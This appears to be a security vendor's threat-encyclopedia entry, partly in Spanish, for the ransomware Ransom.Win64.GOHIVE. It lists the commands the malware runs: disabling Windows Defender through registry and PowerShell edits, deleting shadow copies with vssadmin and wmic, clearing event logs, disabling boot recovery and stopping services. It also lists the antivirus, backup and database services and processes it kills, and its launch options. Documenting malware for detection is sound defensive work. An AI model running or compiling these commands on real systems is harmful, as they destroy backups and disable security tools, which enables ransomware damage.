Ransom.Win64.GOHIVE.EVMSDS

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• {Drive Letter}\{Random String 1}_.key.{Random String 3}

Agrega los procesos siguientes:

• net.exe stop "NetMsmqActivator" /y
• net.exe stop "SamSs" /y
• net.exe stop "SDRSVC" /y
• net.exe stop "SstpSvc" /y
• net.exe stop "UI0Detect" /y
• net.exe stop "vmvss" /y
• net.exe stop "VMware Physical Disk Helper Service" /y
• net.exe stop "VMwareCAFCommAmqpListener" /y
• net.exe stop "VMwareCAFManagementAgentHost" /y
• net.exe stop "VSS" /y
• net.exe stop "wbengine" /y
• net.exe stop "WebClient" /y
• sc.exe config "NetMsmqActivator" start= disabled
• sc.exe config "SamSs" start= disabled
• sc.exe config "SDRSVC" start= disabled
• sc.exe config "SstpSvc" start= disabled
• sc.exe config "UI0Detect" start= disabled
• sc.exe config "vmvss" start= disabled
• sc.exe config "VMware Physical Disk Helper Service" start= disabled
• sc.exe config "VMwareCAFCommAmqpListener" start= disabled
• sc.exe config "VMwareCAFManagementAgentHost" start= disabled
• sc.exe config "VSS" start= disabled
• sc.exe config "wbengine" start= disabled
• sc.exe config "WebClient" start= disabled
• reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
• schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
• reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
• reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
• reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
• reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
• reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
• reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
• vssadmin.exe delete shadows /all /quiet
• wevtutil.exe cl system
• wevtutil.exe cl security
• wevtutil.exe cl application
• wmic.exe SHADOWCOPY /nointeractive
• wmic.exe shadowcopy delete
• bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
• bcdedit.exe /set {default} recoveryenabled no
• cmd.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
• cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
• cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
• notepad.exe {Drive Letter}\eauk_HOW_TO_DECRYPT.txt
• cmd.exe /D /C ping.exe -n 5 {BLOCKED}.{BLOCKED}.0.1 && del "{Malware path and name}"<--BLOCKED 127.0.0.1 -->

Finalización del proceso

Finaliza los servicios siguientes si los detecta en el sistema afectado:

• acronis
• AcrSch2Svc
• Antivirus
• ARSM
• AVP
• backup
• bedbg
• CAARCUpdateSvc
• CASAD2DWebSvc
• ccEvtMgr
• ccSetMgr
• Culserver
• dbeng8
• dbsrv12
• DCAgent
• DefWatch
• EhttpSrv
• ekrn
• Enterprise Client Service
• EPSecurityService
• EPUpdateService
• EraserSvc11710
• EsgShKernel
• ESHASRV
• FA_Scheduler
• firebird
• IISAdmin
• IMAP4Svc
• Intuit
• KAVFS
• KAVFSGT
• kavfsslp
• klnagent
• macmnsvc
• masvc
• MBAMService
• MBEndpointAgent
• McAfee
• McShield
• McTaskManager
• memtas
• mepocs
• mfefire
• mfemms
• mfevtp
• MMS
• MsDtsServer
• MsDtsServer100
• MsDtsServer110
• msexchange
• msmdsrv
• MSOLAP
• MVArmor
• MVarmor64
• NetMsmqActivator
• ntrtscan
• oracle
• PDVFSService
• POP3Svc
• postgres
• QBCFMonitorService
• QBFCService
• QBIDPService
• redis
• report
• RESvc
• RTVscan
• sacsvr
• SamSs
• SAVAdminService
• SavRoam
• SAVService
• SDRSVC
• SepMasterService
• ShMonitor
• Smcinst
• SmcService
• SMTPSvc
• SNAC
• SntpService
• sophos
• sql
• SstpSvc
• stc_raw_agent
• ^svc
• swi_
• Symantec
• TmCCSF
• tmlisten
• tomcat
• TrueKey
• UI0Detect
• veeam
• vmware
• vss
• W3Svc
• wbengine
• WebClient
• wrapper
• WRSVC
• WSBExchange
• YooIT
• zhudongfangyu
• Zoolz

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

• agntsvc
• sql
• CNTAoSMgr
• dbeng50
• dbsnmp
• encsvc
• excel
• firefoxconfig
• infopath
• mbamtray
• msaccess
• mspub
• mydesktop
• Ntrtscan
• ocautoupds
• ocomm
• ocssd
• onenote
• oracle
• outlook
• PccNTMon
• powerpnt
• sqbcoreservice
• steam
• synctime
• tbirdconfig
• thebat
• thunderbird
• tmlisten
• visio
• word
• xfssvccon
• zoolz

Otros detalles

Hace lo siguiente:

• Accepts the following arguments:
  • -skip=[FILE_REGEX] - Regular expression for files excluded from encryption.
  • -stop=[SVC_REGEX] - Regular expression for stopping system services.
  • -kill=[PROC_REGEX] - Regular expression for the names of system services to be stopped.
  • -grant - Change permissions for all files: icacls.exe "[XX]:\*" /grant Everyone:F /T /C /Q
  • -no-wipe - Do not wipe empty disk space with random data.